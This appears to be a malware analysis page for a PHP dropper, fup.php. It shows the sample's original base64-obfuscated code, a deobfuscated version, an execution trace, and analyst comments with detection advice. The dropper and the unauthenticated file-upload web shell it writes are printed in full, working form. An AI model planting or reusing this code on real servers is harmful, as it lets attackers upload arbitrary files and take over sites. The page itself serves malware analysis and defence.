PHP Malware Analysis

fup.php

md5: d9cd93dd61731ef842a855a7240a2835


Screenshot


Attributes

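Encoding: base64_decode (original code, traces)

Files: fopen, fwrite, fclose (deobfuscated code, original code, traces)

Input: _POST, _FILES (referenced only inside the dropped payload string; fup.php itself reads no request input)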


Deobfuscated PHP code

<?php

// Analyst summary (the three statements below are unchanged from the sample).
// Role: dropper. Opens 'payload.php' in mode 'w' (create or truncate), writes one fixed
// PHP source string into it and closes the handle. Nothing in this script evaluates
// the string; it only becomes active if payload.php is later requested through PHP.
// The path is relative, so it resolves against the process working directory. The trace
// on this page shows the script located in /var/www/html/uploads/, which is presumably
// where the file lands (confirm on the affected host).
// The script produces no output: the generated HTML recorded on this page is an empty document.
$x = fopen('payload.php', 'w');
// What the written string contains (second stage, an uploader page):
//  - an HTML multipart/form-data form with a file field "file" and a submit button "_upl";
//  - when $_POST['_upl'] loosely equals "Upload", a copy() of the uploaded temp file to the
//    client-supplied $_FILES['file']['name'], with no authentication and no check on file
//    type or extension; copy() warnings are suppressed with '@';
//  - the same "Upload !!!" text on both the success and the failure branch, so the
//    response body does not tell an observer whether the copy succeeded.
// In the original sample this string is base64-encoded; the trace records fwrite() returning 430.
// Defensive takeaways: alert on new or modified .php files in upload directories, review
// access logs for multipart POST requests to payload.php, and deny PHP execution in (and
// web-server write access to) directories that receive uploads.
fwrite($x, "<?php echo 'Uploader<br>';echo '<br>';echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';echo '<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>';if( \$_POST['_upl'] == \"Upload\" ) {if(@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>");
fclose($x);

Execution traces

data/traces/d9cd93dd61731ef842a855a7240a2835_trace-1676238627.7499.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:50:53.647815]
1	0	1	0.000232	393512
1	3	0	0.000295	394840	{main}	1		/var/www/html/uploads/fup.php	0	0
2	4	0	0.000312	394840	fopen	0		/var/www/html/uploads/fup.php	1	2	'payload.php'	'w'
2	4	1	0.000354	395480
2	4	R			resource(4) of type (stream)
1		A						/var/www/html/uploads/fup.php	1	$x = resource(4) of type (stream)
2	5	0	0.000390	395408	base64_decode	0		/var/www/html/uploads/fup.php	1	1	'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'
2	5	1	0.000425	396080
2	5	R			'<?php echo \'Uploader<br>\';echo \'<br>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) {if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload !!!</b><br><br>\'; }else { echo \'<b>Upload !!!</b><br><br>\'; }}?>'
2	6	0	0.000456	396048	fwrite	0		/var/www/html/uploads/fup.php	1	2	resource(4) of type (stream)	'<?php echo \'Uploader<br>\';echo \'<br>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) {if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload !!!</b><br><br>\'; }else { echo \'<b>Upload !!!</b><br><br>\'; }}?>'
2	6	1	0.000491	396112
2	6	R			430
2	7	0	0.000505	395408	fclose	0		/var/www/html/uploads/fup.php	1	1	resource(4) of type (stream)
2	7	1	0.000520	395008
2	7	R			TRUE
1	3	1	0.000532	394976
			0.000558	314256
TRACE END   [2023-02-12 19:50:53.648183]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php /* Analyst note: dropper as captured. base64_decode() turns the literal below into PHP source for an upload form, which is written to payload.php (relative path, mode 'w'). The decoded text is only written to disk here and is never evaluated by this script. The base64 wrapper hides the form markup and the copy() call from plain-text signature matching, so detection should also key on fopen/fwrite of a .php file fed by base64_decode. */ $x = fopen('payload.php','w'); fwrite($x,base64_decode('PD9waHAgZWNobyAnVXBsb2FkZXI8YnI+JztlY2hvICc8YnI+JztlY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nO2lmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfX0/Pg==')); fclose($x);?>